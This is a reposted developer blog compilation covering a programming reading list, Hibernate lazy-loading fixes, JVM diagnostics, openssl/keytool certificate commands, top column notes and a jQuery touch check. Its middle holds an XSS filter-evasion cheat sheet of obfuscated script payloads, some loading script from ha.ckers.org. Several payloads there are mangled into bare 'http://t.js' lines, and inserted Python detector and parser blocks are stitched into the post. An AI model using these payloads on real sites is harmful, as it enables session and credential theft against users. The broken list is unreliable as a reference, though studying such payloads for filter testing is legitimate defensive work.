[Repost] 10 classic books every serious programmer should read

1. English: The Pragmatic Programmer: From Journeyman to Master
Chinese: 程序員修煉之道︰從小工到專家︰評注版

2. English: The Mythical Man-Month: Essays on Software Engineering, Anniversary Edition (2nd Edition)
Chinese: 人月神話:軟體專案管理之道(20週年)

3. English: Clean Code: A Handbook of Agile Software Craftsmanship
Chinese: 無瑕的程式碼-敏捷軟體開發技巧守則

4. English: The Clean Coder: A Code of Conduct for Professional Programmers (Robert C. Martin Series)
Chinese: 無瑕的程式碼番外篇-專業程式設計師的生存之道

5. English: Refactoring: Improving the Design of Existing Code
Chinese: 重構─改善既有程式的設計, 2/e

6. English: Working Effectively with Legacy Code
Chinese: 修改代碼的藝術

7. English: Code Complete: A Practical Handbook of Software Construction, Second Edition
Chinese: 代碼大全 2

8. English: Head First Design Patterns
Chinese: 深入淺出設計模式

9. English: Peopleware: Productive Projects and Teams (3rd Edition)
Chinese: Peopleware:腦力密集產業的人才管理之道(增訂版)

10. English: Soft Skills: The software developer's life manual

Source: http://softnshare.wordpress.com/2016/02/24/每位認真的程式設計師都要讀的10本經典書/

[Security] Introduction to XSS attack techniques

1. Changing character case
    alert('d')

2. Adding extra characters to evade regular-expression checks
    <alert('c')//
    http://t.js
    " SRC="t.js">
    http://t.js
    '" SRC="t.js">
    ` SRC="t.js">
    http://t.js

3. Using another file extension in place of .js
    http://bad.jpg

4. Putting JavaScript inside a CSS file
    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
       example:
          body {
               background-image: url('javascript:alert("XSS");')
          }

5. Inserting extra characters inside the script tag

    http://t.js

6. Using tab or newline characters to evade filters
    <img src="jav ascr ipt:alert('XSS3')">
    <img src="jav ascr ipt:alert('XSS3')">
    <IMG SRC="jav ascript:alert('XSS');">
         -> tab
         -> new line

7. Using "\" to evade filters
    <STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>
    <IMG STYLE='xss:expre\ssion(alert("XSS33"))'>
    <IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">
    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
    <A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Using hex encoding to evade filters (the ";" may also be dropped)
    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
        Raw source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
        Raw source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

9. Script inside an HTML tag (event handler attributes)
    <body onload="alert('onload')">
        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code contained in a .swf file
    http://ha.ckers.org/xss.swf

11. Splitting the XSS code across CDATA sections and recombining it.
    <XML ID=I><X><C>
    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
    </C></X>
    </xml>
    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

    <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Using HTML+TIME.
    <HTML><BODY>
    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
    <?import namespace="t" implementation="#default#time2">
    <t:set attributeName="innerHTML" to="anywordalert("XSS")">
    </BODY></HTML>
    </BODY></HTML>

13. Writing a cookie via META.
    <META HTTP-EQUIV="Set-Cookie" Content="USERID=alert('XSS')">

14. JavaScript in src, href, url

    <img src="javascript:alert('XSS3')">
    <IMG DYNSRC="javascript:alert('XSS20')">
    <IMG LOWSRC="javascript:alert('XSS21')">
    <LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

    <TABLE BACKGROUND="javascript:alert('XSS29')">
    <DIV STYLE="background-image: url(javascript:alert('XSS30'))">
    <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}
    </STYLE><A CLASS=XSS></A>
    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

Source: Introduction to Cross Site Scripting (XSS) attack techniques
http://htmlpurifier.org/live/smoketests/xssAttacks.php
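Every evasion in the list above works because a naive filter inspects the raw attribute value while the browser decodes entities, drops tabs and newlines inside the scheme, strips CSS comments and backslash escapes, and ignores case. The Python below is an added example (not from the original post and not the htmlpurifier smoke test) that undoes those layers before checking a value, so a server-side filter judges what the browser will actually execute; the DANGEROUS token list, the regexes, the function names and the sample markup are this example's own choices.

```python
import html
import re

# Added example: normalize an HTML attribute value the way a browser would
# before deciding whether it carries script. Token list, regexes and samples
# are constructed for this example, not taken from any library.

# CSS comments (expr/*anyword*/ession) and backslash escapes (expre\ssi\on,
# \6A avascript): a hex escape is 1-6 hex digits plus one optional whitespace
# character; any other escaped character stands for itself.
_CSS_COMMENT = re.compile(r'/\*.*?\*/', re.S)
_CSS_ESCAPE = re.compile(r'\\(?:([0-9a-fA-F]{1,6})[ \t\r\n\f]?|(.))', re.S)
# Characters a browser drops inside a URL scheme (jav<TAB>ascr<LF>ipt:)
_IGNORED = re.compile(r'[\x00\t\n\r\f]')
# name=value pairs inside a tag: double-quoted, single-quoted or bare value
_ATTR = re.compile(r'([A-Za-z][\w:-]*)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))')

DANGEROUS = ('javascript:', 'vbscript:', 'expression(', '@import', 'data:text/html')


def _css_unescape(match):
    hexdigits, literal = match.group(1), match.group(2)
    return chr(int(hexdigits, 16)) if hexdigits else literal


def normalize(value):
    """Decode entities, strip CSS comments/escapes and ignored chars, lowercase."""
    out = html.unescape(value)                 # &#x6A;avascript -> javascript, &#09; -> tab
    out = _CSS_COMMENT.sub('', out)            # expr/*anyword*/ession -> expression
    out = _CSS_ESCAPE.sub(_css_unescape, out)  # expre\ssi\on -> expression
    out = _IGNORED.sub('', out)                # jav<TAB>ascript -> javascript
    return out.lower()                         # JaVaScRiPt -> javascript


def is_dangerous(value):
    """True if the normalized attribute value carries a script-bearing token."""
    normalized = normalize(value)
    return any(token in normalized for token in DANGEROUS)


def scan_attributes(markup):
    """Return (attribute, raw value) pairs that a filter should strip or reject.

    Any on* handler attribute is rejected outright (item 9 above); every other
    attribute is judged on its normalized value (items 1-8 and 14).
    """
    hits = []
    for match in _ATTR.finditer(markup):
        name = match.group(1).lower()
        raw = next(g for g in match.groups()[1:] if g is not None)
        if name.startswith('on') or is_dangerous(raw):
            hits.append((name, raw))
    return hits


# Constructed samples modelled on the payload shapes above; the last one is benign
SAMPLES = [
    '<IMG SRC="jav&#x09;ascript:alert(\'XSS\')">',
    '<img src="jav\tascr\nipt:alert(\'XSS3\')">',
    r'''<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">''',
    '<IMG STYLE="xss:expr/*anyword*/ession(alert(\'sss\'))">',
    '<body onload="alert(\'onload\')">',
    '<img src="https://example.com/a.jpg" alt="javascript is fun">',
]

if __name__ == '__main__':
    for sample in SAMPLES:
        print(repr(sample), '->', scan_attributes(sample) or 'clean')
```

Normalizing and then matching is a detection aid, not a substitute for output encoding: the reliable fix for every item on this list is to encode untrusted data for the context it lands in (HTML body, attribute, URL, CSS) and to disallow untrusted URLs whose scheme is anything other than http or https.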

Java Hibernate.initialize() issue

Recently a colleague hit a problem while backing up a table (Model): a few rows came back in a LazyInitializer state with every field null.
Those rows were exactly the ones where another Model had been fetched earlier, and that Model has a @ManyToOne relation to this table.
The rows were pulled straight out with dao.list(), and the DAO simply does session.createCriteria(clazz).list().
The strange part was that even after calling Hibernate.initialize(XXX), the XXX properties still showed as null when I inspected the fetched objects in the debugger.
While I was still puzzling over it, I evaluated the getter for XXX in the debugger, and it returned a value!
It turns out Hibernate.initialize() initializes the proxy; it does not assign values to the Model's fields directly, so the properties still have to be read through the getters to get the correct values.
I then looked at my colleague's table-backup method: it takes the fetched Model List and converts it straight to JSON with new ObjectMapper().writeValueAsString(list).
That list never had its properties read through the getters, which is why a few LazyInitializer rows ended up with null fields.
In fact, for properties declared fetch = FetchType.LAZY the Hibernate session takes the object from its proxyByKey HashMap, and values of that kind can only really be obtained through the getter.
(Any property declared fetch = FetchType.LAZY can end up null; @OneToMany properties behave the same way, except that @ManyToOne ones come back null every single time.)

So, to sum up the table-backup issue:
Fix 1:
Don't take the shortcut; read every property through its getter. But then you have to write that for every single property...

Fix 2:
Keep new ObjectMapper().writeValueAsString(list),
but call session.clear() before dao.list() --> forcing the session to be reset refreshes the model. Note that flush() and refresh() do not help; it has to be clear().

Fix 3:
Change @ManyToOne(fetch = FetchType.LAZY) on the XXX property to FetchType.EAGER,
so that every time this Model is fetched the XXX property is initialized directly as well.

China Unicom APN

China Unicom APN access point: 3GNET

Two tools for JVM analysis (JVisualVM & GCViewer)

Inspecting OutOfMemory:
a. Add the JVM parameter:
-XX:+HeapDumpOnOutOfMemoryError
b. Generate the dump file manually (to simulate an OutOfMemory; the OOM dump is written to %TOMCAT_HOME%/bin/java_pid.hprof):
Open the process's PID with jconsole from jdk/bin
Go to MBeans > com.sun.management > HotSpotDiagnostics > Operations | DumpHeap > in p1 enter the name of the hprof file to generate (the default is String; the file is created in the same directory as jconsole)
c. Open the java_pid.hprof file with jvisualvm from jdk/bin

Inspecting the GC log:
a. Add the JVM parameters:
-verbose:gc -Xloggc:gc.log
b. Run Tomcat (the file is written to %TOMCAT_HOME%/bin/gc.log)
c. Download GCViewer.jar and open gc.log with it

Reference: Two tools for JVM analysis
http://www.blogjava.net/fastzch/archive/2008/07/20/216240.html

OAuth 2.0 series index

https://blog.yorkxin.org/posts/2013/09/30/oauth2-1-introduction/

Web Security

Security issues of HTTP headers:
http://devco.re/blog/2014/03/10/security-issues-of-http-headers-1/

Preventing CSRF attacks:
http://blog.jdriven.com/2014/10/stateless-spring-security-part-1-stateless-csrf-protection/

Adding x-auth-token to Spring Security:
http://blog.jdriven.com/2014/10/stateless-spring-security-part-2-stateless-authentication/

Vulnerability scanners:
Burp Suite / N-Stalker / nessus

Authentication using certificates, Tomcat and Spring security

Use LDAPS for Spring Security:
http://l-lin.github.io/2014/09/09/Auth_with_certificates_Tomcat_spring/

– Show the LDAPS certificate:
openssl s_client -showcerts -connect myserver:636
– Save it as an X509 certificate file:
echo -n | openssl s_client -connect myserver:636 | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > myserver.crt

– Import the certificate into the JRE truststore (default password: changeit):
keytool -import -keystore /opt/jdk7/jre/lib/security/cacerts -alias myserver -file myserver.crt
– Delete the certificate:
keytool -delete -alias myserver -keystore /opt/jdk7/jre/lib/security/cacerts -storepass changeit

– Client certificate over SSL
http://stackoverflow.com/questions/875467/java-client-certificates-over-https-ssl

-Djavax.net.ssl.keyStoreType=pkcs12
-Djavax.net.ssl.trustStoreType=jks
-Djavax.net.ssl.keyStore=clientcertificate.p12
-Djavax.net.ssl.trustStore=gridserver.keystore
-Djavax.net.debug=ssl # very verbose debug
-Djavax.net.ssl.keyStorePassword=$PASS
-Djavax.net.ssl.trustStorePassword=$PASS

top command explanation

top - 16:23:02 up 14 days, 23:08, 7 users, load average: 0.01, 0.04, 0.12
Tasks: 233 total, 1 running, 232 sleeping, 0 stopped, 0 zombie
%Cpu(s): 0.7 us, 0.3 sy, 0.0 ni, 98.6 id, 0.3 wa, 0.1 hi, 0.1 si, 0.0 st
KiB Mem: 16368856 total, 11506728 used, 4862128 free, 544236 buffers
KiB Swap: 8200188 total, 0 used, 8200188 free, 6060844 cached

a: PID — Process Id
The task’s unique process ID, which periodically wraps, though
never restarting at zero.

b: PPID — Parent Process Pid
The process ID of a task’s parent.

c: RUSER — Real User Name
The real user name of the task’s owner.

d: UID — User Id
The effective user ID of the task’s owner.

e: USER — User Name
The effective user name of the task’s owner.

f: GROUP — Group Name
The effective group name of the task’s owner.

g: TTY — Controlling Tty
The name of the controlling terminal. This is usually the
device (serial port, pty, etc.) from which the process was
started, and which it uses for input or output. However, a
task need not be associated with a terminal, in which case
you’ll see ‘?’ displayed.

h: PR — Priority
The priority of the task.

i: NI — Nice value
The nice value of the task. A negative nice value means higher
priority, whereas a positive nice value means lower priority.
Zero in this field simply means priority will not be adjusted
in determining a task’s dispatchability.

j: P — Last used CPU (SMP)
A number representing the last used processor. In a true SMP
environment this will likely change frequently since the kernel
intentionally uses weak affinity. Also, the very act of
running top may break this weak affinity and cause more
processes to change CPUs more often (because of the extra
demand for cpu time).

k: %CPU — CPU usage
The task’s share of the elapsed CPU time since the last screen
update, expressed as a percentage of total CPU time. In a true
SMP environment, if ‘Irix mode’ is Off, top will operate in
‘Solaris mode’ where a task’s cpu usage will be divided by the
total number of CPUs. You toggle ‘Irix/Solaris’ modes with the
‘I’ interactive command.

l: TIME — CPU Time
Total CPU time the task has used since it started. When
‘Cumulative mode’ is On, each process is listed with the cpu
time that it and its dead children has used. You toggle
‘Cumulative mode’ with ‘S’, which is a command-line option and
an interactive command. See the ‘S’ interactive command for
additional information regarding this mode.

m: TIME+ — CPU Time, hundredths
The same as ‘TIME’, but reflecting more granularity through
hundredths of a second.

n: %MEM — Memory usage (RES)
A task’s currently used share of available physical memory.

o: VIRT — Virtual Image (kb)
The total amount of virtual memory used by the task. It
includes all code, data and shared libraries plus pages that
have been swapped out and pages that have been mapped but not
used.

p: SWAP — Swapped size (kb)
Memory that is not resident but is present in a task. This is
memory that has been swapped out but could include additional
non-resident memory. This column is calculated by subtracting
physical memory from virtual memory.

q: RES — Resident size (kb)
The non-swapped physical memory a task has used.

r: CODE — Code size (kb)
The amount of virtual memory devoted to executable code, also
known as the ‘text resident set’ size or TRS.

s: DATA — Data+Stack size (kb)
The amount of virtual memory devoted to other than executable
code, also known as the ‘data resident set’ size or DRS.

t: SHR — Shared Mem size (kb)
The amount of shared memory used by a task. It simply reflects
memory that could be potentially shared with other processes.

u: nFLT — Page Fault count
The number of major page faults that have occurred for a task.
A page fault occurs when a process attempts to read from or
write to a virtual page that is not currently present in its
address space. A major page fault is when backing storage
access (such as a disk) is involved in making that page
available.

v: nDRT — Dirty Pages count
The number of pages that have been modified since they were
last written to disk. Dirty pages must be written to disk
before the corresponding physical memory location can be used
for some other virtual page.

w: S — Process Status
The status of the task which can be one of:
‘D’ = uninterruptible sleep
‘R’ = running
‘S’ = sleeping
‘T’ = traced or stopped
‘Z’ = zombie
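The five summary lines at the start of this section carry most of what a health check needs (load, task states, CPU split, memory and swap), and the column notes above explain how to read them. The Python below is an added example, not part of the original post, that parses that header into plain numbers and derives the checks a monitoring job would want (zombie tasks, swap in use, load above the CPU count, high iowait, low available memory). The sample header is constructed from the capture above with the zombie count and swap usage changed so the checks have something to report; the thresholds and function names are this example's own choices.

```python
import re

# Added example: parse top's summary header and turn it into alertable
# numbers. Sample text, thresholds and function names are this example's own.

# Constructed sample modelled on the capture above; "zombie" and swap "used"
# are non-zero here so the checks below have something to report.
SAMPLE_HEADER = """\
top - 16:23:02 up 14 days, 23:08,  7 users,  load average: 0.01, 0.04, 0.12
Tasks: 233 total,   1 running, 230 sleeping,   0 stopped,   2 zombie
%Cpu(s):  0.7 us,  0.3 sy,  0.0 ni, 98.6 id,  0.3 wa,  0.1 hi,  0.1 si,  0.0 st
KiB Mem:  16368856 total, 11506728 used,  4862128 free,   544236 buffers
KiB Swap:  8200188 total,  1048576 used,  7151612 free,  6060844 cached
"""

# "233 total, 1 running" style fields: a number followed by its label
_FIELD = re.compile(r'(\d+(?:\.\d+)?)\s+([a-z]+)')


def _fields(line, cast):
    """Map label -> value for everything after the first ':' on the line."""
    body = line.split(':', 1)[1]
    return {label: cast(value) for value, label in _FIELD.findall(body)}


def parse_top_header(text):
    """Return the top summary as a dict of plain numbers."""
    summary = {}
    for line in text.splitlines():
        if line.startswith('top -'):
            load = re.search(r'load average:\s*([\d.]+),\s*([\d.]+),\s*([\d.]+)', line)
            summary['load'] = tuple(float(x) for x in load.groups())
            summary['users'] = int(re.search(r'(\d+) users?', line).group(1))
        elif line.startswith('Tasks:'):
            summary['tasks'] = _fields(line, int)
        elif line.startswith('%Cpu'):
            summary['cpu'] = _fields(line, float)
        elif line.startswith('KiB Mem'):
            summary['mem_kib'] = _fields(line, int)
        elif line.startswith('KiB Swap'):
            summary['swap_kib'] = _fields(line, int)
    return summary


def available_kib(summary):
    """Memory reclaimable for new work: free plus buffers and page cache
    (this top layout prints the 'cached' figure on the Swap line)."""
    mem, swap = summary['mem_kib'], summary['swap_kib']
    return mem['free'] + mem['buffers'] + swap['cached']


def findings(summary, cpu_count, iowait_pct=20.0, min_avail_pct=10.0):
    """Conditions worth alerting on, derived from the header alone."""
    notes = []
    zombies = summary['tasks'].get('zombie', 0)
    if zombies:
        notes.append(f"{zombies} zombie task(s) (status 'Z'): parent has not reaped them")
    swap_used = summary['swap_kib']['used']
    if swap_used > 0:
        notes.append(f"{swap_used} KiB of swap in use")
    load1 = summary['load'][0]
    if load1 > cpu_count:
        notes.append(f"1-min load {load1} exceeds {cpu_count} CPUs")
    iowait = summary['cpu']['wa']
    if iowait >= iowait_pct:
        notes.append(f"iowait {iowait}% (storage bottleneck?)")
    avail_pct = 100.0 * available_kib(summary) / summary['mem_kib']['total']
    if avail_pct < min_avail_pct:
        notes.append(f"only {avail_pct:.1f}% of RAM available")
    return notes


if __name__ == '__main__':
    parsed = parse_top_header(SAMPLE_HEADER)
    for note in findings(parsed, cpu_count=4):
        print('-', note)
```

For a batch job, feed it the first five lines of `top -b -n 1`; the thresholds are deliberately parameters because a sensible iowait or available-memory limit depends on the box.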

[JS] Detecting whether a device supports touch

$(document).ready(function() {
    var $body = $('body');
    var detectMouse = function(e) {
        if (e.type === 'mousedown') {
            alert('Mouse interaction!');
        }
        else if (e.type === 'touchstart') {
            alert('Touch interaction!');
        }
        // remove event bindings, so it only runs once
        $body.off('mousedown touchstart', detectMouse);
    };
    // attach both events to body
    $body.on('mousedown touchstart', detectMouse);
});

Source: http://stackoverflow.com/questions/7838680/detecting-that-the-browser-has-no-mouse-and-is-touch-only